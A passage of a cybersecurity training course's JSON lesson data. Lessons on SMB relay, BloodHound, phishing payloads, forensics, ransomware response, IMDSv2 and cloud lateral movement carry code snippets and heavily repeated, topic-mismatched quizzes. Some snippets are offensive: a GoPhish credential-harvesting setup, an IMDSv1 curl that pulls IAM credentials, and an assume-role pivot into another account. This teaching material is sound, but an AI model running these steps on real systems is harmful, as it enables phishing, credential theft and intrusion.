relayed\n# ntlmrelayx can dump SAM, execute commands, or create users"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"SMB relay fails when...","opts":["The target has antivirus","SMB signing is required","The network uses DHCP","The user is an admin"],"ans":1},{"type":"quiz","q":"Windows equivalent of sudo is...","opts":["su","runas","chmod","admin"],"ans":1},{"type":"quiz","q":"What does 'id' command show?","opts":["IP address","User ID, group ID, and groups","System info","Network interfaces"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"privesc-bloodhound-pathfinding","cat":"Privilege Escalation","title":"BloodHound Attack Path Analysis","diff":2,"xp":200,"intro":"Map every path from your current user to Domain Admin.","sections":[{"type":"text","content":"BloodHound collects AD relationships (who is local admin where, who can DCSync, group memberships) and finds the shortest attack path to your objective."},{"type":"code","lang":"bash","content":"# Collect AD data\n.SharpHound.exe --CollectionMethods All --Domain corp.local\n\n# Upload to BloodHound GUI\n# Drag and drop the ZIP\n\n# Key pre-built queries:\n# 'Shortest Path to Domain Admin'\n# 'Find Kerberoastable Users'\n# 'Users with DCSync Rights'\n# 'Shortest Path from Owned Principals'\n\n# Mark nodes as 'Owned' as you compromise them\n# BloodHound recalculates paths from what you own"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"BloodHound finds attack paths using...","opts":["Port scanning","Active Directory relationship graph analysis","Brute force","Vulnerability scanning"],"ans":1},{"type":"quiz","q":"RSA is an example of...","opts":["Symmetric encryption","Asymmetric encryption","Hashing","Encoding"],"ans":1},{"type":"quiz","q":"A hash function is...","opts":["Reversible","One-way (irreversible)","Bidirectional","Symmetric"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"exploit-phishing-payload","cat":"Exploitation","title":"Crafting Phishing Payloads","diff":2,"xp":150,"intro":"Build convincing phishing lures that deliver your payload.","sections":[{"type":"text","content":"Effective phishing: a pretext the target expects (invoice, delivery notification, password reset), a sense of urgency, and a payload that bypasses email filters (macro doc, HTML smuggling, QR code)."},{"type":"code","lang":"bash","content":"# HTML smuggling \u2014 embed a base64 payload in an HTML email\n# The file is assembled client-side, bypassing email scanners\n\n# GoPhish campaign setup\n./gophish\n# Create sending profile (SMTP)\n# Create landing page (credential harvester)\n# Create email template (convincing pretext)\n# Create user group (targets)\n# Launch campaign\n\n# Track: opened, clicked, submitted credentials"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"HTML smuggling bypasses email filters because...","opts":["It uses encryption","The payload is assembled client-side in the browser","It uses SMTP","It avoids attachments"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"forensics-log-correlation","cat":"Forensics & IR","title":"Log Correlation Across Sources","diff":2,"xp":150,"intro":"One log tells a fragment. Correlating multiple sources tells the story.","sections":[{"type":"text","content":"Correlate: firewall logs (who connected), auth logs (who logged in), proxy logs (what they accessed), endpoint logs (what they ran). Match by timestamp and IP/user."},{"type":"code","lang":"bash","content":"# Example correlation:\n# 1. Firewall: 10.0.0.5 connected to 185.x.x.x:443 at 14:30\n# 2. Proxy: user 'jsmith' from 10.0.0.5 downloaded evil.exe at 14:31\n# 3. Endpoint: jsmith's workstation ran evil.exe at 14:32\n# 4. Auth: jsmith's account accessed the file server at 14:35\n# 5. DNS: 10.0.0.5 resolved c2.evil.com at 14:33\n\n# Timeline tells the story:\n# jsmith clicked a link, downloaded malware, it phoned home,\n# then the attacker used jsmith's creds for lateral movement"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Log correlation is powerful because...","opts":["Single logs show everything","Multiple sources reveal the full attack chain","It's automated","It prevents attacks"],"ans":1},{"type":"quiz","q":"A MITM attack requires the attacker to be...","opts":["On a different network","Between the victim and the server","Physical at the server","Root on the victim"],"ans":1},{"type":"quiz","q":"What protocol does ping use?","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"forensics-ransomware-ir","cat":"Forensics & IR","title":"Ransomware Incident Response","diff":2,"xp":200,"intro":"The clock is ticking. How to respond to an active ransomware attack.","sections":[{"type":"text","content":"Ransomware IR: disconnect affected systems (don't power off \u2014 preserve memory), assess scope, check if backups are intact, identify the strain, check for decryptors, notify stakeholders, and decide: pay or rebuild."},{"type":"code","lang":"bash","content":"# Immediate actions:\n# 1. DISCONNECT affected machines from network (pull cable, not shutdown)\n# 2. DO NOT power off (memory forensics need live RAM)\n# 3. Check: what's encrypted? What's still clean?\n# 4. Identify the strain (ransom note, file extension)\n#    - ID Ransomware: id-ransomware.malwarehunterteam.com\n# 5. Check for free decryptors: nomoreransom.org\n# 6. Verify backup integrity (are backups also encrypted?)\n# 7. Contain: block C2 domains/IPs at firewall\n# 8. Memory dump before anything else\nwinpmem_mini_x64.exe memory.raw"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"First action in a ransomware incident?","opts":["Pay the ransom","Disconnect from network (don't power off)","Reinstall the OS","Call the police"],"ans":1},{"type":"quiz","q":"Which encoding prevents XSS in HTML output?","opts":["Base64","URL encoding","HTML entity encoding","Hex encoding"],"ans":2},{"type":"quiz","q":"Which HTTP method is used to submit form data?","opts":["GET","POST","PUT","TRACE"],"ans":1},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"defense-incident-playbook","cat":"Defense & Blue Team","title":"Writing an IR Playbook","diff":1,"xp":100,"intro":"Pre-planned response steps so you don't panic when the alert fires.","sections":[{"type":"text","content":"An IR playbook defines: trigger conditions, initial triage steps, escalation criteria, containment actions, evidence collection, communication templates, and recovery steps \u2014 all written BEFORE the incident."},{"type":"code","lang":"bash","content":"# Playbook template: Compromised User Account\n# TRIGGER: multiple failed logins followed by a success from unusual IP\n# TRIAGE:\n#   1. Verify: is this the real user? (call them)\n#   2. Check: source IP geolocation, time of day, device\n#   3. Review: what did the account access after login?\n# CONTAIN:\n#   1. Disable the account (don't delete)\n#   2. Revoke active sessions/tokens\n#   3. Block the source IP\n# INVESTIGATE:\n#   1. Check email for phishing (how were creds stolen?)\n#   2. Check for forwarding rules added\n#   3. Check for data access/exfiltration\n# RECOVER:\n#   1. Reset password + enable MFA\n#   2. Re-enable account\n#   3. Monitor for 30 days"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"IR playbooks should be written...","opts":["During the incident","After the incident","Before any incident occurs","Only for critical systems"],"ans":2},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"cloud-imds-v2","cat":"Cloud & Container","title":"IMDSv2 and Metadata Hardening","diff":2,"xp":150,"intro":"IMDSv1 is trivially exploitable via SSRF. IMDSv2 adds token authentication.","sections":[{"type":"text","content":"AWS IMDSv2 requires a PUT request to get a session token before querying metadata. This blocks most SSRF exploits since they typically only support GET."},{"type":"code","lang":"bash","content":"# IMDSv1 (old, vulnerable to SSRF)\ncurl http://169.254.169.254/latest/meta-data/iam/security-credentials/\n\n# IMDSv2 (requires token)\nTOKEN=$(curl -X PUT 'http://169.254.169.254/latest/api/token' -H 'X-aws-ec2-metadata-token-ttl-seconds: 21600')\ncurl -H \"X-aws-ec2-metadata-token: $TOKEN\" http://169.254.169.254/latest/meta-data/\n\n# Enforce IMDSv2 on all instances\naws ec2 modify-instance-metadata-options --instance-id i-xxx --http-tokens required"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"IMDSv2 blocks SSRF because it requires...","opts":["Encryption","A PUT request for a session token (SSRF usually only does GET)","VPN access","IAM permissions"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cloud-lateral-cloud","cat":"Cloud & Container","title":"Cloud-to-Cloud Lateral Movement","diff":3,"xp":250,"intro":"Compromise one cloud service to pivot into others.","sections":[{"type":"text","content":"A Lambda function with S3 access leads to reading secrets from a bucket. Those secrets contain RDS credentials. RDS has a backup with another account's cross-account role ARN. That role has admin in the other account."},{"type":"code","lang":"bash","content":"# Attack chain example:\n# 1. SSRF on web app -> steal Lambda IAM role creds\n# 2. Lambda role can read S3: aws s3 ls / aws s3 cp\n# 3. S3 bucket has .env with RDS creds\n# 4. RDS has a linked role for cross-account access\n# 5. Assume the cross-account role:\naws sts assume-role --role-arn arn:aws:iam::OTHER_ACCOUNT:role/backup --role-session-name pwned\n# 6. Now you're in a different AWS account"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, 